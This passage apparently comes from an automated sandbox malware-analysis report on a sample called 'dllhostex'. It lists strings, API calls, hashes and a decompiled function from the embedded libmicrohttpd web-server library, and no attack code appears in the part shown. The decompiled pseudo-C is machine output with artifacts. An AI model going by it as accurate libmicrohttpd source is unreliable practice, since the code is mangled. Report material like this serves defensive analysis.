                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134C044
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF48
                                                • (NULL != (pos)->next) || ((pos) == (daemon->connections_tail)), xrefs: 0134BFAA
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BFB4
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BEE5
                                                • (NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail)), xrefs: 0134BF39
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF0F
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BEA6
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF43
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF0A
                                                • ! pos->suspended, xrefs: 0134C03A
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->connections_head)), xrefs: 0134BFCF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BFD9
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BEA1
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BEEA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BFDE
                                                • (NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head)), xrefs: 0134BF5E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BF6D
                                                • ! pos->resuming, xrefs: 0134BE97
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134BFB9
                                                • (NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head)), xrefs: 0134BF00
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134BF68
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134C049
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalCurrentEnterSectionThreadshutdown
                                                • String ID: ! pos->resuming$! pos->suspended$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->connections_tail))$(NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail))$(NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->connections_head))$(NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head))$(NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head))$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 1809109673-1951102780
                                                • Opcode ID: 91e109422980460ac001a53395e9b696c7a06cb3c1bd8db215a8aa32c06562d5
                                                • Instruction ID: 5aaf7cd8b6d6ce34db3eaf9a92c14c6463417c73711596864dd71b4d17ed12f1
                                                • Opcode Fuzzy Hash: 91e109422980460ac001a53395e9b696c7a06cb3c1bd8db215a8aa32c06562d5
                                                • Instruction Fuzzy Hash: 2F71BF70641702AFE724DF2AC841BA6FBE4BB04B0CF00852EE55EA7A45D3B5F8548F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134D3D0 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 193COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to join a thread, xrefs: 0134D5E1
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D5B3
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D43D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D609
                                                • false, xrefs: 0134D5FF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D438
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D60E
                                                • 0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD), xrefs: 0134D42E
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D65A
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D696
                                                • Close socket failed., xrefs: 0134D68C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D54F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D5EB
                                                • Failed to destroy ITC., xrefs: 0134D650
                                                • Failed to signal shutdown via inter-thread communication channel, xrefs: 0134D5A9
                                                • 0 == daemon->worker_pool_size, xrefs: 0134D545
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D554
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)$0 == daemon->worker_pool_size$Close socket failed.$Failed to destroy ITC.$Failed to join a thread$Failed to signal shutdown via inter-thread communication channel$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$false
                                                • API String ID: 0-260249329
                                                • Opcode ID: 99758fb0ffd0a86cbb37e826aaf6a65169621966eb6badca3743e1e7664158cc
                                                • Instruction ID: 88eb2ffb2b8164f972e2dda72716038581d4a38bd36fd867426fb8e8b5f127ff
                                                • Opcode Fuzzy Hash: 99758fb0ffd0a86cbb37e826aaf6a65169621966eb6badca3743e1e7664158cc
                                                • Instruction Fuzzy Hash: 085126316407009BF7306BBCEC46FA67BE9AB20B2CF44053DF56AA22D5DB75B9008791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134AE20 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 171synchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 31%
                                                			E0134AE20(void* __ecx) {
				signed int _v36;
				signed int _v40;
				signed int _v44;
				long _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long* _t70;
				long _t71;
				long _t72;
				void* _t75;
				long _t76;
				signed int _t84;
				signed int _t88;
				signed int _t91;
				signed int _t92;
				void* _t102;
				void** _t110;
				signed int _t115;
				signed int _t116;
				long _t119;
				long _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int* _t132;
				void* _t134;
				signed int _t136;
				long* _t141;
				signed int _t143;
				signed int _t145;
				struct _CRITICAL_SECTION* _t152;
				void* _t158;
				void* _t160;
				signed int _t162;
				signed int _t163;
				void* _t165;
				void* _t169;
				void* _t170;

				_t163 = _t162 & 0xfffffff8;
				_push(_t110);
				_push(_t162);
				_t134 = __ecx;
				_t152 = __ecx + 0x9c;
				EnterCriticalSection(_t152);
				_t141 =  *(_t134 + 0x1c);
				_t128 = LeaveCriticalSection;
				if(_t141 == 0) {
					L33:
					return  *_t128(_t152);
				} else {
					_t70 = _t141;
					while(1) {
						_t119 =  *_t141;
						if(_t119 == 0 && _t141 != _t70) {
							break;
						}
						_t71 = _t141[1];
						if(_t71 != 0) {
							L8:
							 *_t71 = _t119;
							goto L9;
						} else {
							if(_t141 !=  *(_t134 + 0x18)) {
								_push("(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))");
								_push(0xbd9);
								_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
								_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
								L38:
								_push(E0135B8FA(2));
								E012938B0(_t120);
								E0135D32E(_t120, E0135B8FA(2));
								_t169 = _t163 + 0x20;
								E0135EBB9(_t110, _t120, _t128, _t134, _t141);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t170 = _t169 - 0x14;
								__eflags =  *(_t120 + 0xe4) & 0x00000004;
								_t84 = _t128;
								_push(_t110);
								_push(_t152);
								_push(_t141);
								_push(_t134);
								_v44 = _t84;
								_v48 = _t120;
								if(( *(_t120 + 0xe4) & 0x00000004) == 0) {
									__eflags =  *((char*)(_t120 + 0xc8));
									if( *((char*)(_t120 + 0xc8)) == 0) {
										_t123 =  *(_t120 + 0x2c);
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x18], xmm0");
										_t85 = 0;
										_t136 = _v36;
										_t143 = _v40;
										__eflags = _t123;
										while(_t123 != 0) {
											_t116 =  *(_t123 + 0x90);
											_t128 =  *(_t123 + 0x94);
											__eflags = _t116;
											if(_t116 != 0) {
												L47:
												__eflags = _t85;
												if(_t85 == 0) {
													L51:
													_t136 =  *(_t123 + 0x8c);
													_t143 =  *((intOrPtr*)(_t123 + 0x88)) + _t116;
													asm("adc edi, edx");
												} else {
													_t160 = _t143 -  *((intOrPtr*)(_t123 + 0x88));
													asm("sbb eax, [ecx+0x8c]");
													__eflags = _t136 - _t128;
													if(__eflags >= 0) {
														if(__eflags > 0) {
															goto L51;
														} else {
															__eflags = _t160 - _t116;
															if(_t160 > _t116) {
																goto L51;
															}
														}
													}
												}
												_t85 = 1;
											} else {
												__eflags = _t128;
												if(_t128 != 0) {
													goto L47;
												}
											}
											_t123 =  *(_t123 + 0xc);
											__eflags = _t123;
										}
										_t125 =  *(_v48 + 0x24);
										__eflags = _t125;
										if(_t125 == 0) {
											L62:
											__eflags = _t85;
											if(_t85 == 0) {
												goto L41;
											} else {
												goto L63;
											}
										} else {
											_t115 =  *(_t125 + 0x90);
											_t128 =  *(_t125 + 0x94);
											__eflags = _t115;
											if(_t115 != 0) {
												L57:
												__eflags = _t85;
												if(_t85 == 0) {
													L61:
													_t136 =  *(_t125 + 0x8c);
													_t143 =  *((intOrPtr*)(_t125 + 0x88)) + _t115;
													asm("adc edi, edx");
												} else {
													_t85 = _t136;
													_t158 = _t143 - _t115;
													asm("sbb eax, edx");
													__eflags = _t136 -  *(_t125 + 0x8c);
													if(__eflags >= 0) {
														if(__eflags > 0) {
															goto L61;
														} else {
															__eflags = _t158 -  *((intOrPtr*)(_t125 + 0x88));
															if(_t158 >  *((intOrPtr*)(_t125 + 0x88))) {
																goto L61;
															}
														}
													}
												}
												L63:
												__imp__GetTickCount64();
												asm("sbb edx, [0x13d5ce4]");
												_t88 = E01354180(_t85 -  *0x13d5ce0, _t128, 0x3e8, 0);
												__eflags = _t136 - _t128;
												if(__eflags > 0) {
													L67:
													_t145 = _t143 - _t88;
													asm("sbb edi, edx");
													__eflags = _t136 - 0x418937;
													if(__eflags < 0) {
														L71:
														_t91 = _t145;
														_t92 = _t91 * 0x3e8;
														_t127 = _t136 * 0x3e8 + (_t91 * 0x3e8 >> 0x20);
														__eflags = _t127;
													} else {
														if(__eflags > 0) {
															L70:
															_t92 = _t88 | 0xffffffff;
															_t127 = _t125 | 0xffffffff;
														} else {
															__eflags = _t145 - 0x4bc6a7ef;
															if(_t145 <= 0x4bc6a7ef) {
																goto L71;
															} else {
																goto L70;
															}
														}
													}
												} else {
													if(__eflags < 0) {
														L66:
														asm("xorps xmm0, xmm0");
														asm("movlpd [esp+0x18], xmm0");
														_t127 = _v36;
														_t92 = _v40;
													} else {
														__eflags = _t143 - _t88;
														if(_t143 >= _t88) {
															goto L67;
														} else {
															goto L66;
														}
													}
												}
												_t132 = _v44;
												 *_t132 = _t92;
												_t132[1] = _t127;
												return 1;
											} else {
												__eflags = _t128;
												if(_t128 == 0) {
													goto L62;
												} else {
													goto L57;
												}
											}
										}
									} else {
										 *_t84 = 0;
										 *(_t84 + 4) = 0;
										return 1;
									}
								} else {
									_push("Illegal call to MHD_get_timeout\n");
									_push(_t120);
									E01351E90();
									_t170 = _t170 + 8;
									L41:
									__eflags = 0;
									return 0;
								}
							} else {
								if(_t71 != 0) {
									goto L8;
								} else {
									 *(_t134 + 0x18) = _t119;
								}
								L9:
								_t120 =  *_t141;
								_t72 = _t141[1];
								if(_t120 != 0) {
									 *(_t120 + 4) = _t72;
								} else {
									 *(_t134 + 0x1c) = _t72;
								}
								 *_t141 = 0;
								_t141[1] = 0;
								 *_t128(_t152);
								if(( *(_t134 + 0xe4) & 0x00000004) == 0 || _t141[0x29] != 0) {
									L16:
									_t74 = _t141[0x36];
									if(_t141[0x36] != 0) {
										_t141[0x36] = 0;
										E0135C9E5(_t74);
										_t163 = _t163 + 4;
									}
									_t110 = _t141[8];
									if(_t110 != 0) {
										_t102 =  *_t110;
										if(_t110[4] != 0) {
											VirtualFree(_t102, 0, 0x8000);
										} else {
											E0135C9E5(_t102);
											_t163 = _t163 + 4;
										}
										E0135C9E5(_t110);
										_t163 = _t163 + 4;
									}
									_t121 =  *((intOrPtr*)(_t134 + 0x40));
									if(_t121 != 0) {
										 *_t121( *((intOrPtr*)(_t134 + 0x44)), _t141,  &(_t141[0xa]), 1);
										_t163 = _t163 + 0x10;
									}
									_t75 = E013490A0(_t110, _t134, _t141[0x13], _t134, _t152, _t141[0x21]);
									_t120 = _t141[7];
									_t165 = _t163 + 4;
									if(_t120 != 0) {
										E0134D9F0(_t75, _t120);
										_t141[7] = 0;
									}
									_t76 = _t141[0x28];
									if(_t76 == 0xffffffff) {
										L29:
										_t77 = _t141[0x13];
										if(_t141[0x13] != 0) {
											E0135C9E5(_t77);
											_t165 = _t165 + 4;
										}
										E0135C9E5(_t141);
										_t163 = _t165 + 4;
										EnterCriticalSection(_t152);
										 *((intOrPtr*)(_t134 + 0xcc)) =  *((intOrPtr*)(_t134 + 0xcc)) - 1;
										_t128 = LeaveCriticalSection;
										 *((char*)(_t134 + 0xc6)) = 0;
										_t141 =  *(_t134 + 0x1c);
										_t70 = _t141;
										if(_t141 != 0) {
											continue;
										} else {
											goto L33;
										}
									} else {
										__imp__#3(_t76);
										if(_t76 != 0) {
											goto L36;
										} else {
											goto L29;
										}
									}
								} else {
									if(WaitForSingleObject(_t141[0x14], 0xffffffff) != 0) {
										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xbdf, "Failed to join a thread\n");
										_t165 = _t163 + 0x10;
										L36:
										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xc14, "Close socket failed.\n");
										_t163 = _t165 + 0x10;
										break;
									} else {
										CloseHandle(_t141[0x14]);
										goto L16;
									}
								}
							}
						}
						goto L73;
					}
					_push("(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))");
					_push(0xbd9);
					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
					goto L38;
				}
				L73:
			}













































                                                0x0134ae23
                                                0x0134ae26
                                                0x0134ae27
                                                0x0134ae2a
                                                0x0134ae2c
                                                0x0134ae33
                                                0x0134ae39
                                                0x0134ae3c
                                                0x0134ae44
                                                0x0134afb0
                                                0x0134afba
                                                0x0134ae4a
                                                0x0134ae4a
                                                0x0134ae50
                                                0x0134ae50
                                                0x0134ae54
                                                0x00000000
                                                0x00000000
                                                0x0134ae5e
                                                0x0134ae63
                                                0x0134ae77
                                                0x0134ae77
                                                0x00000000
                                                0x0134ae65
                                                0x0134ae68
                                                0x0134afbb
                                                0x0134afc0
                                                0x0134afc5
                                                0x0134afca
                                                0x0134b021
                                                0x0134b02b
                                                0x0134b02c
                                                0x0134b03f
                                                0x0134b044
                                                0x0134b047
                                                0x0134b04c
                                                0x0134b04d
                                                0x0134b04e
                                                0x0134b04f
                                                0x0134b050
                                                0x0134b053
                                                0x0134b05d
                                                0x0134b05f
                                                0x0134b060
                                                0x0134b061
                                                0x0134b062
                                                0x0134b063
                                                0x0134b067
                                                0x0134b06b
                                                0x0134b085
                                                0x0134b08c
                                                0x0134b0a8
                                                0x0134b0ab
                                                0x0134b0ae
                                                0x0134b0b4
                                                0x0134b0b6
                                                0x0134b0ba
                                                0x0134b0be
                                                0x0134b0c0
                                                0x0134b0c2
                                                0x0134b0c8
                                                0x0134b0ce
                                                0x0134b0d0
                                                0x0134b0d6
                                                0x0134b0d6
                                                0x0134b0d8
                                                0x0134b0f4
                                                0x0134b0fa
                                                0x0134b100
                                                0x0134b102
                                                0x0134b0da
                                                0x0134b0de
                                                0x0134b0e4
                                                0x0134b0ea
                                                0x0134b0ec
                                                0x0134b0ee
                                                0x00000000
                                                0x0134b0f0
                                                0x0134b0f0
                                                0x0134b0f2
                                                0x00000000
                                                0x00000000
                                                0x0134b0f2
                                                0x0134b0ee
                                                0x0134b0ec
                                                0x0134b104
                                                0x0134b0d2
                                                0x0134b0d2
                                                0x0134b0d4
                                                0x00000000
                                                0x00000000
                                                0x0134b0d4
                                                0x0134b106
                                                0x0134b109
                                                0x0134b109
                                                0x0134b111
                                                0x0134b114
                                                0x0134b116
                                                0x0134b15c
                                                0x0134b15c
                                                0x0134b15e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b118
                                                0x0134b118
                                                0x0134b11e
                                                0x0134b124
                                                0x0134b126
                                                0x0134b12c
                                                0x0134b12c
                                                0x0134b12e
                                                0x0134b14a
                                                0x0134b150
                                                0x0134b156
                                                0x0134b158
                                                0x0134b130
                                                0x0134b132
                                                0x0134b134
                                                0x0134b136
                                                0x0134b138
                                                0x0134b13e
                                                0x0134b140
                                                0x00000000
                                                0x0134b142
                                                0x0134b142
                                                0x0134b148
                                                0x00000000
                                                0x00000000
                                                0x0134b148
                                                0x0134b140
                                                0x0134b13e
                                                0x0134b164
                                                0x0134b164
                                                0x0134b172
                                                0x0134b17f
                                                0x0134b184
                                                0x0134b186
                                                0x0134b1a1
                                                0x0134b1a1
                                                0x0134b1a3
                                                0x0134b1a5
                                                0x0134b1ab
                                                0x0134b1bf
                                                0x0134b1ca
                                                0x0134b1cc
                                                0x0134b1ce
                                                0x0134b1ce
                                                0x0134b1ad
                                                0x0134b1ad
                                                0x0134b1b7
                                                0x0134b1b7
                                                0x0134b1ba
                                                0x0134b1af
                                                0x0134b1af
                                                0x0134b1b5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b1b5
                                                0x0134b1ad
                                                0x0134b188
                                                0x0134b188
                                                0x0134b18e
                                                0x0134b18e
                                                0x0134b191
                                                0x0134b197
                                                0x0134b19b
                                                0x0134b18a
                                                0x0134b18a
                                                0x0134b18c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b18c
                                                0x0134b188
                                                0x0134b1d0
                                                0x0134b1d7
                                                0x0134b1de
                                                0x0134b1e5
                                                0x0134b128
                                                0x0134b128
                                                0x0134b12a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134b12a
                                                0x0134b126
                                                0x0134b08e
                                                0x0134b08e
                                                0x0134b094
                                                0x0134b0a7
                                                0x0134b0a7
                                                0x0134b06d
                                                0x0134b06d
                                                0x0134b072
                                                0x0134b073
                                                0x0134b078
                                                0x0134b07b
                                                0x0134b07b
                                                0x0134b084
                                                0x0134b084
                                                0x0134ae6e
                                                0x0134ae70
                                                0x00000000
                                                0x0134ae72
                                                0x0134ae72
                                                0x0134ae72
                                                0x0134ae79
                                                0x0134ae79
                                                0x0134ae7b
                                                0x0134ae80
                                                0x0134ae87
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae8b
                                                0x0134ae91
                                                0x0134ae98
                                                0x0134aea4
                                                0x0134aecb
                                                0x0134aecb
                                                0x0134aed3
                                                0x0134aed6
                                                0x0134aee0
                                                0x0134aee5
                                                0x0134aee5
                                                0x0134aee8
                                                0x0134aeed
                                                0x0134aef3
                                                0x0134aef5
                                                0x0134af0a
                                                0x0134aef7
                                                0x0134aef8
                                                0x0134aefd
                                                0x0134aefd
                                                0x0134af11
                                                0x0134af16
                                                0x0134af16
                                                0x0134af19
                                                0x0134af1e
                                                0x0134af2a
                                                0x0134af2c
                                                0x0134af2c
                                                0x0134af3a
                                                0x0134af3f
                                                0x0134af42
                                                0x0134af47
                                                0x0134af49
                                                0x0134af4e
                                                0x0134af4e
                                                0x0134af55
                                                0x0134af5e
                                                0x0134af6f
                                                0x0134af6f
                                                0x0134af74
                                                0x0134af77
                                                0x0134af7c
                                                0x0134af7c
                                                0x0134af80
                                                0x0134af85
                                                0x0134af89
                                                0x0134af8f
                                                0x0134af95
                                                0x0134af9b
                                                0x0134afa2
                                                0x0134afa5
                                                0x0134afa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af60
                                                0x0134af61
                                                0x0134af69
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af69
                                                0x0134aeaf
                                                0x0134aebc
                                                0x0134afe6
                                                0x0134afec
                                                0x0134afef
                                                0x0134b004
                                                0x0134b00a
                                                0x00000000
                                                0x0134aec2
                                                0x0134aec5
                                                0x00000000
                                                0x0134aec5
                                                0x0134aebc
                                                0x0134aea4
                                                0x0134ae68
                                                0x00000000
                                                0x0134ae63
                                                0x0134b00d
                                                0x0134b012
                                                0x0134b017
                                                0x0134b01c
                                                0x00000000
                                                0x0134b01c
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,73ED7B40,00000000,?,0000009C,?,0134B2F3), ref: 0134AE33
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,0000009C,?,0134B2F3), ref: 0134AEB4
                                                • CloseHandle.KERNEL32(?,?,0000009C,?,0134B2F3), ref: 0134AEC5
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,0000009C,?,0134B2F3), ref: 0134AF0A
                                                • closesocket.WS2_32(?), ref: 0134AF61
                                                • EnterCriticalSection.KERNEL32(?,?,0000009C), ref: 0134AF89
                                                Strings
                                                • Failed to join a thread, xrefs: 0134AFD1
                                                • Close socket failed., xrefs: 0134AFEF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFF9
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134B01C
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head)), xrefs: 0134AFBB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFDB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFC5
                                                • (NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail)), xrefs: 0134B00D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134B017
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AFCA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterSection$CloseFreeHandleObjectSingleVirtualWaitclosesocket
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))$Close socket failed.$Failed to join a thread$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 898329484-1037770307
                                                • Opcode ID: c01bfd79fc7003fed0eb15aa640fbfdefc989edf5e506fc26e4d6cf4fdd2341f
                                                • Instruction ID: 30648ac22c97d0238eb7020ab443fabbfc90979e95815cd11db5e2e74873b7b5
                                                • Opcode Fuzzy Hash: c01bfd79fc7003fed0eb15aa640fbfdefc989edf5e506fc26e4d6cf4fdd2341f
                                                • Instruction Fuzzy Hash: E651B3B0680711ABEB309B69DC05F16B7ECBF10B0DF00452DE95B97681E732F81487A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134AC30 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 138networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • accept.WS2_32(?,?,0000001C), ref: 0134AC88
                                                • WSAGetLastError.WS2_32 ref: 0134ACB0
                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 0134ACD8
                                                • WSAGetLastError.WS2_32 ref: 0134AD22
                                                • closesocket.WS2_32(00000000), ref: 0134AD66
                                                  • Part of subcall function 01351D20: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 01351D32
                                                Strings
                                                • Failed to set nonblocking mode on incoming connection socket: %s, xrefs: 0134ACBE
                                                • Close socket failed., xrefs: 0134AD70
                                                • Failed to set noninheritable mode on incoming connection socket., xrefs: 0134ACE2
                                                • Hit process or system resource limit at FIRST connection. This is really bad as there is no sane way to proceed. Will try busy waiting for system resources to become magically available., xrefs: 0134ADA7
                                                • Hit process or system resource limit at %u connections, temporarily suspending accept(). Consider setting a lower MHD_OPTION_CONNECTION_LIMIT., xrefs: 0134ADF1
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AD7A
                                                • Error accepting connection: %s, xrefs: 0134AD52
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
